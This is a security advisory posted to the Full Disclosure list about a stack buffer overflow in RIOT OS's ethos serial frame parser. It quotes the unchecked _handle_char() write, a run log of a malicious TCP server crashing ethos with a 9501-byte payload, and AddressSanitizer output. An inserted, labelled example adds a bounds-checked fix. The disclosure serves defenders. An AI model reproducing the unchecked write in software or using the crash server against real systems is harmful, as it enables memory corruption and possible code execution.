From: Ron E <ronaldjedgerson () gmail com>
Date: Sat, 10 Jan 2026 00:26:58 -0500
A stack-based buffer overflow vulnerability exists in the RIOT OS ethos
utility due to missing bounds checking when processing incoming serial
frame data. The vulnerability occurs in the _handle_char() function, where
incoming frame bytes are appended to a fixed-size stack buffer
(serial->frame) without verifying that the current write index
(serial->framebytes) remains within bounds. An attacker capable of sending
crafted serial or TCP-framed input can cause serial->framebytes to exceed
the buffer size (MTU, 9000 bytes), resulting in a write past the end of the
stack buffer. This condition leads to memory corruption, application crash,
and potentially arbitrary code execution depending on compiler options and
runtime protections.
*Vulnerable Code:*
    static void _handle_char(serial_t *serial, char c)
    {
        /* No check that framebytes < MTU before the store */
        serial->frame[serial->framebytes] = c;
        serial->framebytes++;
    }
*Root Cause:*
* serial->frame is a fixed-size stack buffer (char frame[MTU])
* serial->framebytes is unbounded and attacker-controlled
* No validation against MTU before writing
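The following is an added example, not code from RIOT or from the advisory: a minimal model of the frame buffer described above, with a bounds-checked replacement for _handle_char() beside a small framing loop that exercises it with an oversized stream the same size as the PoC payload. MTU, serial_t, frame and framebytes follow the names used in the post; the struct layout, the 0x7E frame delimiter (the '~' visible in the captured response bytes), the discard-until-delimiter recovery, and all helper functions are assumptions, and byte escaping is left out.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not RIOT's ethos.c. Names follow the advisory; the layout,
 * delimiter and helpers are assumptions. Escaping is omitted for brevity. */
#define MTU 9000
#define FRAME_DELIM 0x7e   /* assumed delimiter ('~' in the captured bytes) */

typedef struct {
    char frame[MTU];         /* fixed-size frame buffer, as in the post */
    size_t framebytes;       /* current write index into frame */
    bool discarding;         /* true after an oversized frame until the next delimiter */
    size_t dropped_frames;   /* frames rejected for exceeding MTU */
    size_t completed_frames; /* frames terminated by a delimiter */
} serial_t;

static void serial_init(serial_t *serial)
{
    memset(serial, 0, sizeof(*serial));
}

/* Hardened replacement for _handle_char(): the write index is compared with
 * the buffer size before every store. A frame that would exceed MTU is
 * dropped as a whole and input is ignored until the next delimiter, so the
 * buffer is never written past its end. Returns false if the byte was not stored. */
static bool handle_char_checked(serial_t *serial, char c)
{
    if (serial->discarding) {
        return false;
    }
    if (serial->framebytes >= sizeof(serial->frame)) {
        serial->discarding = true;
        serial->framebytes = 0;
        serial->dropped_frames++;
        return false;
    }
    serial->frame[serial->framebytes++] = c;
    return true;
}

/* Minimal framing loop: a delimiter closes the current frame (or ends the
 * discard state); every other byte goes through handle_char_checked().
 * Returns how many bytes were stored into frames. */
static size_t feed_bytes(serial_t *serial, const unsigned char *buf, size_t len)
{
    size_t stored = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == FRAME_DELIM) {
            if (serial->discarding) {
                serial->discarding = false;
            } else if (serial->framebytes > 0) {
                serial->completed_frames++;
                serial->framebytes = 0;
            }
            continue;
        }
        if (handle_char_checked(serial, (char)buf[i])) {
            stored++;
        }
    }
    return stored;
}

/* Constructed stand-in for an oversized payload: `len` filler bytes with no
 * delimiter, delivered in chunks the way a TCP peer would send them. */
static size_t feed_filler(serial_t *serial, size_t len)
{
    unsigned char chunk[1024];
    memset(chunk, 'A', sizeof(chunk));
    size_t stored = 0;
    while (len > 0) {
        size_t n = len < sizeof(chunk) ? len : sizeof(chunk);
        stored += feed_bytes(serial, chunk, n);
        len -= n;
    }
    return stored;
}

int main(void)
{
    serial_t serial;
    serial_init(&serial);

    size_t stored = feed_filler(&serial, 9501);   /* same size as the PoC payload */
    printf("stored %zu of 9501 bytes, dropped frames: %zu, index now %zu\n",
           stored, serial.dropped_frames, serial.framebytes);

    /* After the oversized frame, a well-formed frame is still parsed. */
    static const unsigned char good[] = { FRAME_DELIM, 'h', 'i', FRAME_DELIM };
    feed_bytes(&serial, good, sizeof(good));
    printf("completed frames: %zu\n", serial.completed_frames);
    return 0;
}
```

With the 9501-byte stream, exactly MTU bytes are stored, the frame is then dropped and the remaining 501 bytes are ignored; the index never reaches 9000 at the moment of a store, which is the condition the sanitizer reports further down. Dropping the whole oversized frame rather than truncating it avoids delivering a partial frame upstream, and counting dropped frames gives a cheap signal worth logging on a device that should never see such input.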
*Proof of Concept:*
*listener:*
# python3 payload.py
This exploit acts as a MALICIOUS SERVER.
Run ethos like: ./ethos tap0 tcp:127.0.0.1 20000
The exploit will send the payload when ethos connects.
[*] Starting malicious server on 0.0.0.0:20000
[*] Architecture: aarch64
[*] Exploitation mode: crash
[+] Server listening on 0.0.0.0:20000
[!] Waiting for ethos to connect...
[*] Run ethos like this:
./ethos tap0 tcp:127.0.0.1 20000
[+] ethos client connected from ('127.0.0.1', 37114)
[*] Generating crash payload...
[+] Crash payload ready: 9501 bytes
[*] Waiting 1 second before sending payload...
[*] Sending malicious payload (9501 bytes)...
[*] Sent 1024/9501 bytes...
[*] Sent 2048/9501 bytes...
[*] Sent 3072/9501 bytes...
[*] Sent 4096/9501 bytes...
[*] Sent 5120/9501 bytes...
[*] Sent 6144/9501 bytes...
[*] Sent 7168/9501 bytes...
[*] Sent 8192/9501 bytes...
[*] Sent 9216/9501 bytes...
[*] Sent 9501/9501 bytes...
[+] Payload sent successfully!
[!] ethos client should crash now (check for ASAN output)
[*] Received response:
b'~}"\x00\x00\x00\x00\x00\x00~~}"\x00\x00\x00\x00\x00\x00~'
[*] Connection from ('127.0.0.1', 37114) closed
*Connection:*
./ethos tap0 tcp:127.0.0.1 20000
*Output:*
----> ethos: sending hello.
----> ethos: activating serial pass through.
ethos.c:186:5: runtime error: index 9000 out of bounds for type 'char[9000]'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ethos.c:186:5
=================================================================
==1375066==ERROR: AddressSanitizer: stack-buffer-overflow on address 0xfbff8f804848 at pc 0xaaaae0b9fad0 bp 0xffffece78420 sp 0xffffece78418
WRITE of size 1 at 0xfbff8f804848 thread T0
    #0 0xaaaae0b9facc in _handle_char /root/RIOT/dist/tools/ethos/ethos.c:186:39
    #1 0xaaaae0b9ed38 in _serial_handle_byte /root/RIOT/dist/tools/ethos/ethos.c:216:17
    #2 0xaaaae0b9ed38 in main /root/RIOT/dist/tools/ethos/ethos.c:559:34
    #3 0xffff91162598 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0xffff91162678 in __libc_start_main csu/../csu/libc-start.c:360:3
    #5 0xaaaae0ab67ec in _start (/root/RIOT/dist/tools/ethos/ethos+0x367ec) (BuildId: 4734887eb4858e961729a4e74b8fbfbd73e74d82)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in RIOT ethos Serial Frame Parser Ron E (Jan 10)